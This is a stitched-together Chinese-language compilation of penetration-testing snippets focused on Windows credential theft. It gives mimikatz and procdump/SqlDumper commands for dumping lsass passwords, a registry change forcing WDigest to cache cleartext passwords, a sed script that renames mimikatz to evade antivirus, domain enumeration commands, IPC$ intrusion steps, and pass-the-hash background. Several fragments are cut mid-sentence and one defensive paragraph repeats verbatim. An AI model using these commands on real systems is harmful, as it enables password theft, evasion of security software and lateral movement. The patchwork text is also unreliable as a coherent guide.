mimikatz

1.mimikatz mimikatz.exe "sekurlsa::debug" "sekurlsa::logonPasswords full" >>1.txt exit 2.procdump 1、在目前机器上执行 procdump.exe -accepteula -ma lsass.exe lsass.dmp 2、把lsass.dmp下载到本地，放在同样的系统（目标是windows2008-->本地也用Windows2008） 3、mimikatz加载lsass.dmp sekurlsa::minidump lsass.dmp 4、抓取密码 sekurlsa::logonPasswords full 3.SqlDumper.exe 1、如果目标系统上安装了windows sql server ，SqlDumper.exe默认存放在c:\Program Files\Microsoft SQL Server\number\Shared，其中number代表sql server的版本 140 for SQL Server 2017 130 for SQL Server 2016 120 for SQL Server 2014 110 for SQL Server 2012 100 for SQL Server 2008 90 for SQL Server 2005

其实现在的杀软还是玩的老一套，改改特征字符就能过了，最新的defender能用这个方法过 git clone https://github.com/gentilkiwi/mimikatz.git lmmg mv lmmg/mimikatz lmmg/lmmg find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')"; mv "${FILE}" "${newfile}"; done find lmmg/ -type f -name '*kiwi*' | while read FILE ; do newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')"; mv "${FILE}" "${newfile}"; done find lmmg/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' find lmmg/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' find lmmg/ -type f -print0 | xargs -0

一、域操作相关的命令 1.查看域用户 net user/domain 2.查看有几个域 net view/domain 3.查看域内的主机 net view/domain: XXX 4.查看域里面的组 net group/domain 5.查看域内所有的主机名 net group "domain computers" /domain 6.查看域管理员 net group "domain admins" /domain 7.查看域控制器 net group "domain controllers" /domain 8.查看企业管理组 net group "enterprise admins" /domain 9.查看时间服务器 nettime/domain 二、IPC$入侵 IPC$入侵，即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵，在内网中及其常见。 假设现在有一台IPC$主机：127.0.0.25，输入以下命令。 #连接127.0.0.25的IPC$共享： D:>net use \127.0.0.25\ipc$ #复制srv.exe到目标主机 D:>copy srv.exe \127.0.0.25\ipc$ #查时间 D:>net time\127.0.0.25 #用at命令在10点50分启动srv.exe(注意这里设置的时间比主机时间快) D:>at

最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查，部分防守方缺乏对攻击者的正确认知，攻击者的手法已经比较高超了，不扫描，不落地，污染日志等都很普及了。同时也要正确认知对手：攻防演练中，攻击者并非无所不能，他们面临着和防御方一样的问题：时间紧，任务重。所以攻击者的攻击目标，攻击手法也是有迹可循的,知己知彼才能百战百胜。 渗透测试 一、知彼 攻击者也是讲成本的，因此防守方最好的策略是：做的比其他防守方好一点点即可。好一点的含义：不在低级问题上犯错（弱密码、互联网应用远程RCE、管理后台暴露、重要服务器未打补丁等）。对于“时间紧、任务重”的防守方来说，修建固若金汤的防线显然意味着大成本投入，以及最紧缺的时间，因此本文不会面面俱到，只选择性价比高值得快速投入的安全措施和大家分享。 攻击者一般： 目标明确、步骤清晰、控制成本、反检测，反清理、三流分立。 目标明确： 攻击者只攻击得分项，和必要路径（外网入口，内网立足点），对这些目标采取高等级手段，会隐蔽操作；对非必要路径顺路控制下来的服务器，并不怕被发现，用起来比较随意，甚至主动制造噪音，干扰防守方。 步骤清晰：信息收集-控制入口-横向移动-维持权限-攻击目标系统。每一步都是经典操作和教科书式手法。 控制成本： 优先攻击高权限账号，如管理员，目标系统负责人账号； 优先攻击运维/安全人员账号和终端

最近我们Sinesafe参加的几家机构的渗透测试防守方防护方案评估复查，部分防守方缺乏对攻击者的正确认知，攻击者的手法已经比较高超了，不扫描，不落地，污染日志等都很普及了。同时也要正确认知对手：攻防演练中，攻击者并非无所不能，他们面临着和防御方一样的问题：时间紧，任务重。所以攻击者的攻击目标，攻击手法也是有迹可循的,知己知彼才能百战百胜。 渗透测试 一、知彼 攻击者也是讲成本的，因此防守方最好的策略是：做的比其他防守方好一点点即可。好一点的含义：不在低级问题上犯错（弱密码、互联网应用远程RCE、管理后台暴露、重要服务器未打补丁等）。对于“时间紧、任务重”的防守方来说，修建固若金汤的防线显然意味着大成本投入，以及最紧缺的时间，因此本文不会面面俱到，只选择性价比高值得快速投入的安全措施和大家分享。 攻击者一般： 目标明确、步骤清晰、控制成本、反检测，反清理、三流分立。 目标明确： 攻击者只攻击得分项，和必要路径（外网入口，内网立足点），对这些目标采取高等级手段，会隐蔽操作；对非必要路径顺路控制下来的服务器，并不怕被发现，用起来比较随意，甚至主动制造噪音，干扰防守方。 步骤清晰：信息收集-控制入口-横向移动-维持权限-攻击目标系统。每一步都是经典操作和教科书式手法。 控制成本： 优先攻击高权限账号，如管理员，目标系统负责人账号； 优先攻击运维/安全人员账号和终端

windows下使用： 　　1.打开软件，输入命令指令运行 　　2.priviege::debug 　　3.sekurlsa::logonpasswords　　 linux渗透使用： 　　 1.启动msf，渗透到目标主机后在返回的shell窗口里面加载mimikatz 　　2.加载mimikatz命令：load mimikatz 　　3.运行命令查看密码：①priviege::debug②sekurlsa::logonpasswords查看密码 来源： https://www.cnblogs.com/PrideAssassin/p/11580754.html

一.windows2008以上不保存明文密码解决办法 在默认情况下，当系统为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，密码字段显示为null，此时可以通过以下方式开启，但需要用户重新登录后才能成功抓取。 cmd： reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 在开启 Wdigest Auth 后，需要管理员重新登录才能抓明文密码。 强制锁屏，让管理员重新登录。 rundll32 user32.dll,LockWorkStation 二.procdump+mimikatz procdump64.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit" 三.SqlDumper + mimikatz SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL Server\number\Shared，number代表SQL

启动一个文本文件 tasklist 查看进程列表 可以看到notepad.exe正在后台运行 procdump -ma notepad.exe notepad.dmp -m memory -a all 意思就是将和notepad.exe程序有关的所有内存dump下来保存为.dmp文件 当前目录下生成一个notepad.dmp文件 将dump文件中的字符串重定向到notepad.txt文件中 strings notepad.dmp > notepad.txt 通过Ctrl+f 快速搜索，可以找到我们刚刚执行的命令 然后我们使用截图工具截一张cmd窗口的图片，并且使用画图工具打开，这个时候生成一个mspaint .exe进程。 这个时候我们重新dump关于mspaint.exe程序的相关内存镜像 procdump.exe -ma mspaint.exe mspaint.dmp 然后再mstsc打开远程桌面，重新dump内存 将dump下来的mspaint.dmp和mstsc.dmp拷贝到kali或者parrot中，我这里使用的parrot。 然后我们使用linux下的gimp尝试将内存中的图像还原 由于gimp不能直接打开dmp文件，我们首先需要将.dmp改为.data,然后就可以使用gimp打开了 cp mspaint.dmp mspaint.data cp mstsc.dmp

mimikatz 是一款windows平台下的神器，它具备很多功能，我认为最牛逼的是lsass.exe进程中获取windows的账号明文密码，当然他的其他功能也很强大。是在下才疏学浅，没有精通。 mimikatz获取密码 安装 mimikatz_trunk 以管理员身份运行 命令如下： 　　privilege::debug 　　sekurlsa::logonpasswords >在对目标进行攻击的时候，对方有安全软件的情况下可以先安装procdump64.exe，获取到 lsass.dmp 文件，然后在自己的环境下运行mimikatz这样就获取到目标密码。 安装procdump64.exe 这是微软自己的工具所以不会存在任何异常所以放心使用 命令如下： procdump64.exe -accepteula -ma lsass.exe lsass.dmp 获取到 lsass.dmp文件后可以用 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit 来获取明文密码，最后的exit是运行完成之后停止，不然会一直运行下去 来源： https://www.cnblogs.com/Scholar-liu/p/11379950.html

总结下PtH具体形式(wmicexec、powershell、msf等) 0x01 PtH攻击原理 && 黄金白银票据 PtH攻击原理 wiki https://en.wikipedia.org/wiki/Pass_the_hash 写的也很清楚 其中重要的是windows使用系统API( LsaLogonUser )生成hash进行认证，而不是用明文， 所以利用hash即可模拟用户登录进行操作 。还有的是如果密码长度大于15就不存在LM Hash，从windows2008开始微软默认禁用LM hash。 这也就很好理解pth的原理了。 Windows Server 2008启用LM hash的方法： gpedit.msc - 计算机配置 - Windows 设置 - 安全设置 - 本地策略 - 安全选项 找到 网络安全︰ 不要在下次更改密码存储 LAN 管理器的哈希值 ，选择 已禁用 系统下一次更改密码后，就能够导出LM hash 接下里回顾下kerberos认证过程 ，区别白银票据和黄金票据区别。 kerberos认证粗略流程: client向kerberos服务请求，希望获取访问server的权限。 kerberos得到了这个消息，首先得判断client是否是可信赖的， 也就是白名单黑名单的说法。这就是AS服务完成的工作，通过 在AD中存储黑名单和白名单来区分client